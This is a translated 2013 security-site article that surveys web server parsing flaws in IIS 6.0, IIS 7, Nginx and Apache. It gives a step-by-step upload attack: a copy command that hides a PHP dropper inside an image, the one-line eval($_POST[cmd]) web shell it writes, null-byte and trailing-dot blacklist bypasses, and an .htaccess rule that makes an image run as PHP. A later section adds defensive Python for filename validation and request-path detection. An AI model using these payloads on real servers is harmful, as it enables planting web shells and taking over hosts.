Summary of common web server parsing vulnerabilities - Vulnerability Alerts - Black Bar Safety Net

ID MYHACK58:62201338349
Type myhack58
Reporter Anonymous
Modified 2013-04-17T00:00:00


Author : laterain

[+]IIS 6.0

Directory parsing: /xx.asp/xx.jpg

xx.jpg can be replaced by any text file (e.g. xx.txt) whose content is the backdoor code.

IIS 6.0 parses xx.jpg, placed inside a directory named xx.asp, as an ASP file.

Suffix parsing: /xx.asp;.jpg

IIS 6.0 parses a file with such a suffix as an ASP file.

Default parsing: /xx.asa

/xx.cer

/xx.cdx

Besides .asp, IIS 6.0 by default also treats these three extensions as executable.

They can be combined with the directory parsing vulnerability:

/xx.asa/xx.jpg or /xx.cer/xx.jpg or xx.asa;.jpg

[+]IIS 7.0/IIS 7.5/Nginx <0.8.03

With Fast-CGI enabled in the default configuration, appending /xx.php to a file path (/xx.jpg) causes /xx.jpg/xx.php to be parsed as a PHP file.

Common method of use:

Combine a picture with a text file containing backdoor code into a malicious image, writing the text after the image's binary data so that the image header and trailer are not damaged.

For example:

copy xx.jpg /b + yy.txt /a xy.jpg

/b means binary mode

/a means ASCII mode

xx.jpg is a normal picture file

yy.txt contains <?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

which writes the content <?php eval($_POST[cmd])?> to a file named shell.php.

Find a place to upload xy.jpg, then find the address of xy.jpg and append /xx.php to that address.

The malicious text is then executed, and the one-line Trojan shell.php is generated in the picture directory.

Password: cmd

[+]Nginx <0.8.03

With Fast-CGI disabled, Nginx <0.8.03 still has a parsing vulnerability.

Append %00.php to a file path (/xx.jpg):

/xx.jpg%00.php will be parsed as a PHP file.

[+]Apache

Suffix parsing: test.php.x1.x2.x3

Apache determines the suffix from right to left: if x3 is not a recognized suffix it checks x2, and so on until it finds a suffix it recognizes, and then parses the file according to that suffix. So test.php.x1.x2.x3 is parsed as PHP.

From experience: php|php3|phtml can all be parsed by Apache.

[+]Some other tricks

In a Windows environment, files named xx.jpg[space] or xx.jpg. cannot exist. If a file is given such a name, Windows removes the trailing space or dot by default, and this can also be exploited.

When uploading to a Windows host, you can capture the request and modify the file name by adding a trailing space or dot to try to bypass a blacklist. If the upload succeeds, the trailing dot or space is removed and you get the shell. I remember Fck Php 2.6 had an extra-space bypass vulnerability.

{Not on Linux hosts; Linux allows such files to exist}

If .htaccess can be executed in Apache (it is not by default; a friend at 90sec mentioned this, I was not aware of it before) and .htaccess can be uploaded, you can try writing the following in .htaccess:

<FilesMatch "shell.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

Change shell.jpg to the name of the file you uploaded; shell.jpg can then be parsed as a PHP file.
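Two defensive checks covering the filename and URL tricks described in the sections above, added here as example code (not from the original article). The extension lists and the image-upload whitelist are constructed for the example; the first function validates only the name, not the file content, so it must be paired with a server configuration that never executes scripts from the upload directory.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Extensions the servers discussed above hand to a script engine (ASP family on
# IIS 6.0, PHP family on Apache/Nginx); list constructed for this example.
SCRIPT_EXTS = {"asp", "asa", "cer", "cdx", "php", "php3", "phtml"}
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif"}   # example image-upload whitelist
SAFE_STEM = re.compile(r"^[a-z0-9_-]{1,64}$")


def safe_upload_name(client_name: str) -> Optional[str]:
    """Return a normalized filename, or None if the upload must be refused.

    Refuses every filename trick in the article: NUL truncation (xx.jpg%00.php),
    the IIS 6.0 ';' suffix (xx.asp;.jpg), NTFS streams (xx.asp:.jpg), the trailing
    dot/space Windows strips, double extensions (test.php.x1.x2) and .htaccess.
    """
    name = client_name.replace("\\", "/").rsplit("/", 1)[-1]  # drop client dirs
    if "\x00" in name or ";" in name or ":" in name:
        return None
    if name != name.rstrip(". "):            # 'xx.jpg.' or 'xx.jpg ' on Windows
        return None
    stem, dot, ext = name.rpartition(".")
    ext = ext.lower()
    if not dot or "." in stem or not SAFE_STEM.match(stem.lower()):
        return None                          # no ext, double ext, or '.htaccess'
    if ext not in ALLOWED_EXTS or ext in SCRIPT_EXTS:
        return None
    return f"{stem.lower()}.{ext}"           # file content is NOT inspected here


def looks_like_parse_attack(url_path: str) -> bool:
    """Flag a request path shaped like one of the parsing tricks above.

    For a WAF rule or for scanning access logs; %00 is decoded first so
    'xx.jpg%00.php' is seen as a NUL byte. ';' also matches ';jsessionid='
    path parameters, so tune this for applications that use them.
    """
    path = unquote(url_path)
    if "\x00" in path or ";" in path or ":" in path:
        return True
    segments = [s for s in path.split("/") if s]
    for i, seg in enumerate(segments):
        exts = [e.lower() for e in seg.split(".")[1:]]
        last = i == len(segments) - 1
        if not last and exts and exts[-1] in SCRIPT_EXTS | ALLOWED_EXTS:
            return True                      # /xx.asp/xx.jpg or /xx.jpg/xx.php
        if last and any(e in SCRIPT_EXTS for e in exts[:-1]):
            return True                      # test.php.x1.x2 right-to-left match
    return False
```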

[+]Corrections

Earlier it was stated that under IIS 6.0 /xx.asp:.jpg could be parsed {a file such as /xx.asp:.jpg cannot exist under Windows; the :.jpg is automatically removed, leaving /xx.asp}. Corrected:

First, thanks to Nuclear Attack for the reminder.

When uploading a /xx.asp:.jpg file, the :.jpg does indeed disappear, but the resulting /xx.asp has no content, because ... it is hard to explain, everyone can see for themselves.